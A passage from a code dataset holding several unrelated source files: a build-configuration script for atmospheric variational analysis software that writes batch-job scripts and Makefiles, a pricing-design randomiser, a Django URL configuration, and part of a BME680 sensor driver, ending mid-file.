('ncgen','ncgen',1),\n ('ncks','ncks',1),\n ('ncrcat','ncrcat',1),\n ('ncrename','ncrename',1),\n ('ncwa','ncwa',1),\n ('date','date',2),\n ('awk','awk',2),\n ('sed','sed',2),\n ('gdl or idl','gdl',2)\n )\nfor w,file,stats in checkbin:\n sys.stdout.flush()\n sys.stdout.write('Checking for %s ... 
'%w)\n sys.stdout.flush()\n status,fn=file_search(file)\n if status:\n sys.stdout.write('%s\\n'%fn)\n else:\n if stats == 2:\n if file != 'gdl':\n status,fn=file_search('g%s'%file)\n altnames[file]='g%s'%file\n else:\n status,fn=file_search('idl')\n if status:\n sys.stdout.write('%s\\n'%fn)\n else:\n sys.stdout.write('error, not found\\n')\n missing_package.append(w)\n elif stats == 1 :\n sys.stdout.write('error, not found\\n')\n missing_package.append(w)\n elif stats == 0:\n sys.stdout.write('warning, not found\\n')\nmissing_module=[]\nif BATCH:\n method=dict(pbs='qsub',slurm='sbatch')[BATCH]\n BATCH=BATCH.lower()\n proj_file=os.path.join(os.pardir,'.proj')\n if not PROJECT:\n a=raw_input('Warning option for creating batch jobs is set but no PROJECT if given, is that correct? [Y|n]: ')\n if a.lower()[0] in ( 'n', '0' , 'f' ):\n sys.exit(257)\n os.system('touch %s'%proj_file)\n else:\n f=open(proj_file,'w')\n f.write(PROJECT)\n f.close()\n if len(MAIL) == 0:\n MAIL = raw_input('No user email is given, enter now: ')\n if BATCH == 'pbs':\n batch_header=u\"\"\"#PBS -P ${pro}\n# set stdout/stderr location\n#PBS -o ${jobdir%/}/seas${seas}.out\n#PBS -e ${jobdir%/}/seas${seas}.err\n#PBS -l wd\n# email options (abort,beg,end)\n#PBS -m ae\n#PBS -M XXX\n# set name of job\n#PBS -N seas$seas\n#PBS -lsoftware=idl\n#PBS -q express\n#PBS -l walltime=08:00:00\n#PBS -l mem=14GB\n\"\"\"\n elif BATCH == 'slurm':\n batch_header =u\"\"\"#SBATCH --job-name=seas$seas\n#SBATCH --time=04:00:00\n#SBATCH --mem=4000\n#SBATCH --mail-type=END,FAIL\n#SBATCH --mail-user=XXX\n#SBATCH --output=${jobdir%/}/seas${seas}.out\n#SBATCH --error=${jobdir%/}/seas${seas}.err\n#SBATCH --cpus-per-task=1\n#SBATCH --nodes=1\n#SBATCH --ntasks=8\n\"\"\"\n batch_header=batch_header.replace('XXX',MAIL.lower())\n batch_job='''#!/bin/bash\n\nechoerr() {\n echo \"$@\" 1>&2\n exit 257\n}\n\n\npro=$(cat $(dirname $0)/.proj)\nseas='0'\nid='0'\nwhile [[ $# -ge 1 ]]\ndo\n\ttypeset -l option=\"${1}\"\n\tcase \"${option}\" in\n\t\t( \"-d\" | \"--dir\" )\n\t\tdir=\"${2:-${dir}}\"\n\t\tshift; shift\n\t\t;;\n\t\t( \"-s\" | \"--seas\" )\n\t\tseas=\"${2:-${seas}}\"\n\t\tshift; shift\n\t\t;;\n ( \"-p\" | \"--proj\" )\n\t\tseas=\"${2:-${seas}}\"\n\t\tshift; shift\n\t\t;;\n\n\t\t( * )\n\t\techo \"E: Unknown option: ${1}\"\n echo \"Usage: ${0} [OPTIONS]\"|sed \"s#./##g\"\n echo \"Options:\"\n echo \"-d , --dir : Parent directory\"\n echo \"-p , --projcet : The project id that is used for charing cpu time\"\n echo \"-s , --seas : The name of the season [e.g. 9900]\"\n\t\texit 2\n\t\t;;\n\tesac\ndone\ndeclare -a d=( $dir $seas )\ndeclare -a z=( '--dir' '--job_id' )\nfor o in {0..1}; do\n if ([ -z \"${d[$o]}\" ] || [ ${d[$o]} == '0' ]);then\n echoerr \"Aborting ... 
${z[$o]} option not given\"\n    fi\ndone\n# Construct the directories\narminput=${dir%/}/ARM/${seas%/}\nraininput=${dir%/}/CPOL/${seas%/}\nva_input=${dir%/}/var_ana/va_inputs/${seas%/}\noutput=${dir%/}/var_ana/va_output/${seas%/}\n\nworkdir=$(dirname $(readlink -f $0))\njobdir=${workdir%/}/Jobs/\nmkdir -p ~/.va_jobs\nrm -rf ~/.va_jobs/THE_PBS_submit-${seas}.sh 2> /dev/null\n\nfor m in $(module list 2>&1 |grep -iv currently|awk '{print $NF}'|grep -v found|uniq);do\n    mod=$(echo $m|rev | cut -d\"/\" -f2- | rev)\n    modules=$(echo -n \"${modules}module load $m\\\\n\")\ndone\nmodules=$(echo -e $modules)\ncat << EOF >> ~/.va_jobs/THE_PBS_submit-${seas}.sh\n#!/bin/bash\n# set project\nTHE_SCRIPT\n#dd\n$modules\n\ncd ${workdir}\n${workdir%/}/preprocess.sh -a $arminput -r $raininput -v $va_input -o $output\n\nEOF\n\nchmod +x ~/.va_jobs/THE_PBS_submit-${seas}.sh\necho submitting ~/.va_jobs/THE_PBS_submit-${seas}.sh via YYYY\nYYYY ~/.va_jobs/THE_PBS_submit-${seas}.sh\n'''\n    batch_job = batch_job.replace('THE_SCRIPT',batch_header).replace('THE_PBS',BATCH)\n    bash_script = os.path.join(os.pardir,'submit_%s.sh'%BATCH)\n    f=open(bash_script,'w')\n    f.write(batch_job.replace('YYYY',method).replace('#dd',host))\n    f.close()\n    os.chmod(bash_script, os.stat(bash_script).st_mode | stat.S_IEXEC)\n\nfor module in ['netCDF4','datetime','numpy','glob']:\n    sys.stdout.flush()\n    sys.stdout.write('Checking for python module %s ... '%module)\n    time.sleep(sleep)\n    sys.stdout.flush()\n    try:\n        __import__(module)\n        sys.stdout.write('ok\\n')\n    except ImportError:\n        sys.stdout.write('module %s not found\\n'%module)\n        missing_module.append(module)\n\nif len(missing_module) > 0 or len(missing_package) > 0:\n    if len(missing_package):\n        sys.stderr.write(\"Error: The following %s packages aren't installed:\\n\"\\\n            \"\\t %s\\n if they are installed try changing the PATH environment variable \\n\"%(Os,' '.join(missing_package)))\n    if len(missing_module):\n        sys.stderr.write(\"Error: The following python modules aren't installed:\\n\"\\\n            \"\\t %s\\n if they are installed try changing the PYTHONPATH environment variable \\n\"%(' '.join(missing_module)))\n    sys.exit(1)\n\n\nversion_conflict=[]\nfor command,min_v in (('sed',3.5),('bash',3.5),('date',6.0),('awk',3.1)):\n    try:\n        cmd=altnames[command]\n    except KeyError:\n        cmd=command\n    sys.stdout.flush()\n    sys.stdout.write('checking version for %s ... '%command)\n    sys.stdout.flush()\n    time.sleep(sleep)\n    process=Popen([cmd,'--version'],stdout=PIPE)\n    output, err = process.communicate()\n    exit_code = process.wait()\n    fl = float(b'.'.join(re.findall(b'\\d+',output.split(b'\\n')[0])[0:2]))\n    if fl < min_v:\n        sys.stdout.write('%2.2f < %2.2f\\n'%(fl,min_v))\n        version_conflict.append(command)\n    else:\n        sys.stdout.write('%2.2f\\n'%fl)\n\nif len(version_conflict):\n    sys.stderr.write('the following packages are out of date, and need to be updated:\\n'\n        '\\t %s\\n'%(' '.join(version_conflict)))\n    sys.exit(1)\nfor libs in (CLIBS.split(','),FLIBS.split(',')):\n    for l in libs:\n        status=False\n        sys.stdout.write('checking status of %s... 
'%l)\n time.sleep(sleep)\n for path in LDFLAGS:\n if len(glob.glob(os.path.join(path,'*'+l+'*'))):\n status=True\n elif len(glob.glob(os.path.join(path, 'GNU', '*'+l+'*'))):\n status=True\n if status:\n sys.stdout.write('ok \\n')\n else:\n sys.stdout.write('missing\\n')\n sys.stdout.write('if this library is installed try changing your LD_LIBRARY_PATH variable, note that you MUST have installed the Fortran AND C netcdf libraries\\n')\n sys.exit(1)\n\ntry:\n os.mkdir(os.path.join(os.path.dirname(__file__),'test'))\nexcept OSError:\n pass\n\nmakefile_var =\"\"\"\n# Makefile for variational analysis code, and various testing routines.\n#\n#\n# created %s\n#\n#\nFC\t\t= %s\nPREFIX\t\t= %s\nFCFLAGS\t\t= %s\nLDFLAGS\t\t= %s\nINCLUDE \t= %s\nLIBS\t\t= %s\nFFLAGS\t\t= $(FCFLAGS) $(LDFLAGS) $(INCLUDE)\n\nSOURCE \t\t= portable.f90 \\\\\n constants.f90 \\\\\n physics.f90 \\\\\n lu.f90 \\\\\n settings.f90 \\\\\n numerics.f90 \\\\\n time.f90 \\\\\n io.f90 \\\\\n variational_analysis.f90 \\\\\n 3d_put.f90 \\\\\n 2d_put.f90 \\\\\n budget_put.f90 \\\\\n process_va_output.f90\n\nOBJS\t\t:= $(SOURCE:.f90=.o)\n\n.SUFFIXES:\n.SUFFIXES:\t.o .f90 .mod\n\n.f90.o:\n\t\t$(FC) -c $(FFLAGS) $*.f90\n\n.f90.mod:\n\t\t$(FC) -c $(FFLAGS) $*.f90\n\nall: untar source\n\nuntar :\n\t@echo \"############## EXTRACTING TESTFILES ############################\"\n\ttar xvjf test.tar.bz2\nsource:\t\t$(OBJS)\n\t\t$(FC) $(FFLAGS) variational_analysis.o time.o lu.o constants.o settings.o portable.o physics.o numerics.o \\\\\n\t\t\tio.o -o test/variational_analysis $(LIBS)\n\t\t$(FC) $(FFLAGS) time.o lu.o constants.o portable.o settings.o 3d_put.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/3d_put $(LIBS)\n\t\t$(FC) $(FFLAGS) time.o lu.o constants.o portable.o settings.o 2d_put.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/2d_put $(LIBS)\n\t\t$(FC) $(FFLAGS) time.o lu.o constants.o portable.o settings.o budget_put.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/budget_put $(LIBS)\n\t\t$(FC) $(FFLAGS) lu.o time.o constants.o portable.o settings.o process_va_output.o io.o physics.o numerics.o \\\\\n\t\t\t-o test/process_va_output $(LIBS)\n\t\tcd ./raerr; make\n\t\t@echo \"########### MAKE TESTS #############################\"\n\t\tcd test ; ./preprocess.sh all 2> ../test.out\n\t\t@echo Test output wirtten to test.out\n\t\t@echo Check test result for errors if desired\n\t\t@echo \"########### TESTS DONE ############################\"\n\t\t@echo \" Now type 'make install' and 'make clean' \"\n\nclean:\n\t\trm -rf *.o lu.mod constants.mod io.mod settings.mod portable.mod physics.mod numerics.mod time.mod core $(PREFIX)/variational_analysis $(PREFIX)/*_put $(PREFIX)/process_va_output test test.out\n\t\tcd ./raerr; make clean\ninstall:\n\t\tmv test/process_va_output $(PREFIX)/\n\t\tmv test/budget_put $(PREFIX)/\n\t\tmv test/2d_put $(PREFIX)/\n\t\tmv test/3d_put $(PREFIX)/\n\t\tmv test/variational_analysis $(PREFIX)/\n\t\tcd ./raerr; make install\n\"\"\"%(datetime.datetime.today().strftime(\"%e. 
%B %Y\"),FC,PREFIX,FFLAGS,'-L'+' -L'.join(LDFLAGS),'-I'+' -I'.join(INCLUDE.split(',')),'-l'+' -l'.join(FLIBS.split(',')))\nmakefile_radar =\"\"\"\n# Makefile for radar error code, and various testing routines.\n#\n#\n# created %s\n#\n#\nCC\t\t= %s\nPREFIX\t\t= %s\nCCFLAGS\t\t= %s\nLDFLAGS\t\t= %s\nINCLUDE \t= %s\nLIBS\t\t= %s\nCFLAGS\t\t= $(CCFLAGS) $(LDFLAGS) $(INCLUDE)\n\nSOURCE\t\t= radar_error.c \\\n\t\t\t read_command.c \\\n\t\t\t read_error_stats.c \\\n\t\t\t deallocate.c \\\n\t\t\t read_radar_data.c \\\n\t\t\t calculate_pdfs.c \\\n\t\t\t distance.c \\\n\t\t\t find_percentile_error.c \\\n\t\t\t lncdf.c \\\n\t\t\t write_pdfs.c\nOBJS\t\t:= $(SOURCE:.c=.o)\nEXE\t\t\t= radar_error\n.SUFFIXES:\t.o .c\n.c.o:\n\t\t\t$(CC) -c $(CFLAGS) $*.c\nall:\t\t$(EXE)\n$(EXE):\t\t$(OBJS)\n\t\t\t$(CC) $(CFLAGS) $(OBJS) $(LIBS) -o ../test/process_rain/$(EXE)\nclean:\n\t\t\trm -f $(OBJS) core $(EXE)\ninstall:\n\t\t\tmv ../test/process_rain/$(EXE) $(PREFIX)/process_rain/\n\"\"\"%(datetime.datetime.today().strftime(\"%e. %B %Y\"),CC,PREFIX,CFLAGS,'-L'+' -L'.join(LDFLAGS),'-I'+' -I'.join(INCLUDE.split(',')),'-l'+' -l'.join(CLIBS.split(',')))\n\n\n\n\n\n\n\nsys.stdout.flush()\nsys.stdout.write(\"Creating Makefiles ... \")\nsys.stdout.flush()\ntime.sleep(2)\nf=open('Makefile','w')\nf.write(makefile_var)\nf.close()\nf=open(os.path.join(os.path.dirname(__file__),'raerr','Makefile'),'w')\nf.write(makefile_radar)\nf.close()\nsys.stdout.write(\"ok\\n\")\nsys.stdout.write(\"Now type 'make' to compile the source code and 'make install' to install the VA programs\\n\")\n\n","repo_name":"antarcticrainforest/var_analysis","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":16361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5468270391","text":"import pandas as pd\r\nimport numpy as np\r\nimport timeit\r\nimport random\r\nimport collections\r\n\r\ndef random_gen(numberof_fam, fam=None):\r\n    # avoid a shared mutable default list between calls\r\n    if fam is None:\r\n        fam = []\r\n    for i in range(numberof_fam):\r\n        fam.append(random.randint(1, 5))\r\n    return fam\r\n\r\ndef range_prices(variance: int, price: int):\r\n    if variance == 0:\r\n        min_price = 1\r\n        max_price = 5\r\n    elif variance == 1 and price == 1:\r\n        min_price = 1\r\n        max_price = 2\r\n    elif variance == 1 and price == 5:\r\n        min_price = 4\r\n        max_price = 5\r\n    elif variance == 2 and price == 1:\r\n        min_price = 1\r\n        max_price = 3\r\n    elif variance == 2 and price == 5:\r\n        min_price = 3\r\n        max_price = 5\r\n    elif variance == 1 and price == 2:\r\n        if random.randint(1, 2) == 1:\r\n            min_price = 1\r\n            max_price = 2\r\n        else:\r\n            min_price = 2\r\n            max_price = 3\r\n    elif variance == 1 and price == 3:\r\n        if random.randint(1, 2) == 1:\r\n            min_price = 2\r\n            max_price = 3\r\n        else:\r\n            min_price = 3\r\n            max_price = 4\r\n    elif variance == 1 and price == 4:\r\n        if random.randint(1, 2) == 1:\r\n            min_price = 3\r\n            max_price = 4\r\n        else:\r\n            min_price = 4\r\n            max_price = 5\r\n    elif variance == 2 and price == 2:\r\n        if random.randint(1, 2) == 1:\r\n            min_price = 1\r\n            max_price = 3\r\n        else:\r\n            min_price = 2\r\n            max_price = 4\r\n    elif variance == 2 and price == 3:\r\n        if random.randint(1, 3) == 1:\r\n            min_price = 1\r\n            max_price = 3\r\n        elif random.randint(2, 3) == 2:\r\n            min_price = 2\r\n            max_price = 4\r\n        else:\r\n            min_price = 3\r\n            max_price = 5\r\n    elif variance == 2 and price == 4:\r\n        if random.randint(1, 2) == 1:\r\n            min_price = 2\r\n            max_price = 4\r\n        else:\r\n            min_price = 3\r\n            max_price = 5\r\n    elif variance == 99:\r\n        min_price = 1\r\n        max_price = 5\r\n    return 
min_price, max_price\r\n\r\n # initiate timer\r\nstarttime = timeit.default_timer()\r\n\r\n # read CSV Files\r\ndesign_df = pd.read_csv(\"OriginalDesignV2.csv\")\r\nprices_df = pd.read_csv(\"Prices.csv\")\r\ninfo_df = pd.read_csv(\"info.csv\")\r\n\r\n # Initiate variables/arrays in Design\r\nversion_d = design_df.iloc[0:, 0:1].values\r\ntask_d = design_df.iloc[0:, 1:2].values\r\nconcept_d = design_df.iloc[0:, 2:3].values\r\nSKU_d = design_df.iloc[0:, 3:4].values\r\n\r\n # Initiate Variables/Arrays in Prices\r\nSKU_p = prices_df.iloc[0:, 0:1].values\r\nfamily_p = prices_df.iloc[0:, 2:3].values\r\n\r\n # Initiate Variables/Arrays in Info\r\ntask_i = info_df.iloc[0:, 0:1].values\r\nvariance_i = info_df.iloc[0:, 2:3].values\r\n\r\nnumber_of_designs = max(version_d).item() # Versions\r\nnumber_of_tasks = max(task_d).item() # Tasks\r\nnumber_of_concepts = max(concept_d).item() # concepts\r\nnumber_of_SKUs = max(SKU_p).item()\r\nnumber_of_fam = max(family_p).item() # Number of families\r\nnumber_of_pp = 5\r\nmax_pp_SKU = [None]*number_of_SKUs\r\n\r\nfor z in range(number_of_SKUs):\r\n max_pp_SKU[z] = round((np.count_nonzero(SKU_d == z+1, axis=0).item()/number_of_pp)+0.5,0)\r\n\r\nposition = 0\r\nprice = []\r\nnew_price = 0\r\nstarting_price = []\r\nfam = []\r\n\r\npp = np.zeros((number_of_SKUs,number_of_pp))\r\n\r\nfor i in range(number_of_designs):\r\n current_design = i\r\n for k in range(number_of_tasks):\r\n fam = []\r\n a = []\r\n for q in range(number_of_fam):\r\n fam.append(random.randint(1, 5))\r\n starting_price = []\r\n min_pricex = [0]*11\r\n max_pricex = [0]*11\r\n current_variance = variance_i[k].item()\r\n # if current_variance == 0:\r\n # fam = []\r\n # for q in range(number_of_fam):\r\n # fam.append(random.randint(1, 5))\r\n for w in range(number_of_fam):\r\n if current_variance == 0:\r\n starting_price.append(fam[w])\r\n else:\r\n min_pricex[w], max_pricex[w] = range_prices(current_variance,fam[w])\r\n # print(min_pricex, max_pricex)\r\n # elif current_variance == 1 and fam[w] ==1:\r\n # min_price[w] = 1\r\n # max_price[w] = 2\r\n # elif current_variance == 1 and fam[w] ==5:\r\n # min_price[w] = 4\r\n # max_price[w] = 5\r\n # elif current_variance == 2 and fam[w] ==1:\r\n # min_price[w] = 1\r\n # max_price[w] = 3\r\n # elif current_variance == 2 and fam[w] ==5:\r\n # min_price[w] = 3\r\n # max_price[w] = 5\r\n # elif current_variance == 1 and fam[w] == 2:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 1\r\n # max_price[w] = 2\r\n # else:\r\n # min_price[w] = 2\r\n # max_price[w] = 3\r\n # elif current_variance == 1 and fam[w] == 3:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 2\r\n # max_price[w] = 3\r\n # else:\r\n # min_price[w] = 3\r\n # max_price[w] = 4\r\n # elif current_variance == 1 and fam[w] == 4:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 3\r\n # max_price[w] = 4\r\n # else:\r\n # min_price[w] = 4\r\n # max_price[w] = 5\r\n # elif current_variance == 2 and fam[w] == 2:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 2\r\n # max_price[w] = 4\r\n # else:\r\n # min_price[w] = 1\r\n # max_price[w] = 3\r\n # elif current_variance == 2 and fam[w] == 3:\r\n # if random.randint(1,3) == 1:\r\n # min_price[w] = 3\r\n # max_price[w] = 5\r\n # elif random.randint(2,3) == 2:\r\n # min_price[w] = 1\r\n # max_price[w] = 3\r\n # else:\r\n # min_price[w] = 2\r\n # max_price[w] = 4\r\n # elif current_variance == 2 and fam[w] == 4:\r\n # if random.randint(1,2) == 1:\r\n # min_price[w] = 3\r\n # max_price[w] = 5\r\n # else:\r\n # min_price[w] = 
2\r\n # max_price[w] = 4\r\n # elif current_variance == 99:\r\n # min_price[w] = 1\r\n # max_price[w] = 5\r\n # print(starting_price)\r\n for y in range(number_of_concepts): # current Concept\r\n start = 0\r\n current_sku = SKU_d[position].item()\r\n current_family = family_p[current_sku-1].item()\r\n if current_variance == 0:\r\n starting_price2 = starting_price[current_family-1]\r\n # if pp[current_sku - 1, starting_price2 - 1] <= max_pp_SKU[current_sku - 1]:\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n # else:\r\n # correct = False\r\n # p=0\r\n # while correct == False:\r\n # starting_price[current_family - 1] = random.randint(1, 5)\r\n # starting_price2 = starting_price[current_family - 1]\r\n # p += 1\r\n # if p >= 5:\r\n # start = starting_price2\r\n # pp[current_sku - 1, start - 1] += 1\r\n # break\r\n # elif pp[current_sku - 1, starting_price2 - 1] <= max_pp_SKU[current_sku - 1]:\r\n # correct = True\r\n # start = starting_price2\r\n # pp[current_sku - 1, start - 1] += 1\r\n else:\r\n starting_price2 = random.randint(min_pricex[current_family-1],max_pricex[current_family-1])\r\n if pp[current_sku-1, starting_price2-1]<= max_pp_SKU[current_sku-1]:\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n else:\r\n correct = False\r\n p=0\r\n while correct == False:\r\n starting_price2 = random.randint(min_pricex[current_family - 1], max_pricex[current_family - 1])\r\n p += 1\r\n if p >= 2:\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n break\r\n elif pp[current_sku - 1, starting_price2 - 1] <= max_pp_SKU[current_sku - 1]:\r\n correct = True\r\n start = starting_price2\r\n pp[current_sku - 1, start - 1] += 1\r\n price.append(start)\r\n position += 1\r\n\r\n # else:\r\n # starting_price2 = random.randint(min_price[current_family-1],max_price[current_family-1])\r\n # if pp[current_sku-1, starting_price2-1]<= max_pp_SKU[current_sku-1]:\r\n # start = starting_price2\r\n # pp[current_sku - 1, start - 1] += 1\r\nprint(pp)\r\n#\r\n # Add Price Column to Original Design\r\ndesign_df.loc[:,'Price'] = price\r\n\r\n # Write Final Design to CSV\r\ndesign_df.to_csv('FinalDesign.csv')\r\n\r\n # Print processing time\r\nprint(\"Run Time was:\", round((timeit.default_timer() - starttime)*1000, 2), \"ms or \", round((timeit.default_timer() - starttime),2), \"s\")\r\n","repo_name":"sephi900/test2","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12294766786","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'catalogo'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('catalogo/lista//', views.lista, name='lista'),\n path('busca', views.busca, name='busca'),\n]\n","repo_name":"pontual/sistema-v1","sub_path":"catalogo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38597551724","text":"import time\nimport math\nfrom micropython import const\n\ntry:\n import struct\nexcept ImportError:\n import ustruct as struct\n\n__version__ = \"0.\" + \"$Revision: 6.3 $\"[11:-2]\n__repo__ = \"https://github.com/adafruit/Adafruit_CircuitPython_BME680.git\"\n\n\n# I2C ADDRESS/BITS/SETTINGS\n# -----------------------------------------------------------------------\n_BME680_CHIPID = const(0x61)\n\n_BME680_REG_CHIPID = const(0xD0)\n_BME680_BME680_COEFF_ADDR1 = const(0x89)\n_BME680_BME680_COEFF_ADDR2 = const(0xE1)\n_BME680_BME680_RES_HEAT_0 = const(0x5A)\n_BME680_BME680_GAS_WAIT_0 = const(0x64)\n\n_BME680_REG_SOFTRESET = const(0xE0)\n_BME680_REG_CTRL_GAS = const(0x71)\n_BME680_REG_CTRL_HUM = const(0x72)\n_BME680_REG_STATUS = const(0x73)\n_BME680_REG_CTRL_MEAS = const(0x74)\n_BME680_REG_CONFIG = const(0x75)\n\n_BME680_REG_MEAS_STATUS = const(0x1D)\n_BME680_REG_PDATA = const(0x1F)\n_BME680_REG_TDATA = const(0x22)\n_BME680_REG_HDATA = const(0x25)\n\n_BME680_SAMPLERATES = (0, 1, 2, 4, 8, 16)\n_BME680_FILTERSIZES = (0, 1, 3, 7, 15, 31, 63, 127)\n\n_BME680_RUNGAS = const(0x10)\n\n_LOOKUP_TABLE_1 = (\n 2147483647.0,\n 2147483647.0,\n 2147483647.0,\n 2147483647.0,\n 2147483647.0,\n 2126008810.0,\n 2147483647.0,\n 2130303777.0,\n 2147483647.0,\n 2147483647.0,\n 2143188679.0,\n 2136746228.0,\n 2147483647.0,\n 2126008810.0,\n 2147483647.0,\n 2147483647.0,\n)\n\n_LOOKUP_TABLE_2 = (\n 4096000000.0,\n 2048000000.0,\n 1024000000.0,\n 512000000.0,\n 255744255.0,\n 127110228.0,\n 64000000.0,\n 32258064.0,\n 16016016.0,\n 8000000.0,\n 4000000.0,\n 2000000.0,\n 1000000.0,\n 500000.0,\n 250000.0,\n 125000.0,\n)\n\n\ndef _read24(arr):\n \"\"\"Parse an unsigned 24-bit value as a floating point and return it.\"\"\"\n ret = 0.0\n # print([hex(i) for i in arr])\n for b in arr:\n ret *= 256.0\n ret += float(b & 0xFF)\n return ret\n\n\nclass Adafruit_BME680:\n \"\"\"Driver from BME680 air quality sensor\n\n :param int refresh_rate: Maximum number of readings per second. Faster property reads\n will be from the previous reading.\"\"\"\n\n # def __init__(self, *, refresh_rate=10):\n def __init__(self, raw=False, calibrate=None, debug=False, refresh_rate=10):\n \"\"\"Check the BME680 was found, read the coefficients and enable the sensor for continuous\n reads.\"\"\"\n self._write(_BME680_REG_SOFTRESET, [0xB6])\n time.sleep_ms(5)\n\n # Check device ID.\n chip_id = self._read_byte(_BME680_REG_CHIPID)\n if chip_id != _BME680_CHIPID:\n raise RuntimeError(\"Failed to find BME680! Chip ID 0x%x\" % chip_id)\n\n self._read_calibration()\n\n # set up heater\n self._write(_BME680_BME680_RES_HEAT_0, [0x73])\n self._write(_BME680_BME680_GAS_WAIT_0, [0x65])\n\n self.sea_level_pressure = 1013.25\n \"\"\"Pressure in hectoPascals at sea level. 
Used to calibrate ``altitude``.\"\"\"\n # added\n self.raw = raw\n self.calibrate = { 'temperature': None, 'pressure': None, 'humidity': None, 'altitude': None, 'gas': None, 'AQI': None, 'gas_base': None}\n if (not raw) and (type(calibrate) is dict):\n for k in calibrate.keys():\n if not k in self.calibrate.keys(): continue\n if (k != 'gas_base') and (not type(calibrate[k]) is list):\n continue\n self.calibrate[k] = calibrate[k]\n\n self._debug = debug\n # Default oversampling and filter register values.\n self._pressure_oversample = 0b011\n self._temp_oversample = 0b100\n self._humidity_oversample = 0b010\n self._filter = 0b010\n\n self._adc_pres = None\n self._adc_temp = None\n self._adc_hum = None\n self._adc_gas = None\n self._gas_range = None\n self._t_fine = None\n self.hum_base = 80.0 # 80.0 outdoor best, 40.0-50.0 indoor best\n self.hum_weight = 0.25 # calculation of AQ score (25:75, humidity:gas)\n self._t_fine = None\n self._status = 0\n self.gas_base = self.calibrate['gas_base']\n\n self._last_reading = 0\n self._min_refresh_time = int(1 / refresh_rate * 1000) # in milli secs\n\n @property\n def pressure_oversample(self):\n \"\"\"The oversampling for pressure sensor\"\"\"\n return _BME680_SAMPLERATES[self._pressure_oversample]\n\n # calibrate by length calibration factor (Taylor) array\n def _calibrate(self,cal,value):\n if self.raw: return value\n if (not cal) or (type(cal) != list):\n return round(value,2)\n if type(value) is int: value = float(value)\n if not type(value) is float:\n return None\n rts = 0; pow = 0\n for a in cal:\n rts += a*(value**pow)\n pow += 1\n return rts\n\n @pressure_oversample.setter\n def pressure_oversample(self, sample_rate):\n if sample_rate in _BME680_SAMPLERATES:\n self._pressure_oversample = _BME680_SAMPLERATES.index(sample_rate)\n else:\n raise RuntimeError(\"Invalid oversample\")\n\n @property\n def humidity_oversample(self):\n \"\"\"The oversampling for humidity sensor\"\"\"\n return _BME680_SAMPLERATES[self._humidity_oversample]\n\n @humidity_oversample.setter\n def humidity_oversample(self, sample_rate):\n if sample_rate in _BME680_SAMPLERATES:\n self._humidity_oversample = _BME680_SAMPLERATES.index(sample_rate)\n else:\n raise RuntimeError(\"Invalid oversample\")\n\n @property\n def temperature_oversample(self):\n \"\"\"The oversampling for temperature sensor\"\"\"\n return _BME680_SAMPLERATES[self._temp_oversample]\n\n @temperature_oversample.setter\n def temperature_oversample(self, sample_rate):\n if sample_rate in _BME680_SAMPLERATES:\n self._temp_oversample = _BME680_SAMPLERATES.index(sample_rate)\n else:\n raise RuntimeError(\"Invalid oversample\")\n\n @property\n def filter_size(self):\n \"\"\"The filter size for the built in IIR filter\"\"\"\n return _BME680_FILTERSIZES[self._filter]\n\n @filter_size.setter\n def filter_size(self, size):\n if size in _BME680_FILTERSIZES:\n self._filter = _BME680_FILTERSIZES.index(size)\n else:\n raise RuntimeError(\"Invalid size\")\n\n @property\n def temperature(self):\n \"\"\"The compensated temperature in degrees celsius.\"\"\"\n self._perform_reading()\n calc_temp = ((self._t_fine * 5) + 128) / 256\n return self._calibrate(self.calibrate['temperature'],calc_temp / 100) #\n\n @property\n def pressure(self):\n \"\"\"The barometric pressure in hectoPascals\"\"\"\n self._perform_reading()\n var1 = (self._t_fine / 2) - 64000\n var2 = ((var1 / 4) * (var1 / 4)) / 2048\n var2 = (var2 * self._pressure_calibration[5]) / 4\n var2 = var2 + (var1 * self._pressure_calibration[4] * 2)\n var2 = (var2 / 4) + 
(self._pressure_calibration[3] * 65536)\n var1 = (\n (((var1 / 4) * (var1 / 4)) / 8192)\n * (self._pressure_calibration[2] * 32)\n / 8\n ) + ((self._pressure_calibration[1] * var1) / 2)\n var1 = var1 / 262144\n var1 = ((32768 + var1) * self._pressure_calibration[0]) / 32768\n calc_pres = 1048576 - self._adc_pres\n calc_pres = (calc_pres - (var2 / 4096)) * 3125\n calc_pres = (calc_pres / var1) * 2\n var1 = (\n self._pressure_calibration[8] * (((calc_pres / 8) * (calc_pres / 8)) / 8192)\n ) / 4096\n var2 = ((calc_pres / 4) * self._pressure_calibration[7]) / 8192\n var3 = (((calc_pres / 256) ** 3) * self._pressure_calibration[9]) / 131072\n calc_pres += (var1 + var2 + var3 + (self._pressure_calibration[6] * 128)) / 16\n return self._calibrate(self.calibrate['pressure'],calc_pres/100) #\n\n @property\n def relative_humidity(self):\n \"\"\"The relative humidity in RH %\"\"\"\n return self.humidity\n\n @property\n def humidity(self):\n \"\"\"The relative humidity in RH %\"\"\"\n self._perform_reading()\n temp_scaled = ((self._t_fine * 5) + 128) / 256\n var1 = (self._adc_hum - (self._humidity_calibration[0] * 16)) - (\n (temp_scaled * self._humidity_calibration[2]) / 200\n )\n var2 = (\n self._humidity_calibration[1]\n * (\n ((temp_scaled * self._humidity_calibration[3]) / 100)\n + (\n (\n (\n temp_scaled\n * ((temp_scaled * self._humidity_calibration[4]) / 100)\n )\n / 64\n )\n / 100\n )\n + 16384\n )\n ) / 1024\n var3 = var1 * var2\n var4 = self._humidity_calibration[5] * 128\n var4 = (var4 + ((temp_scaled * 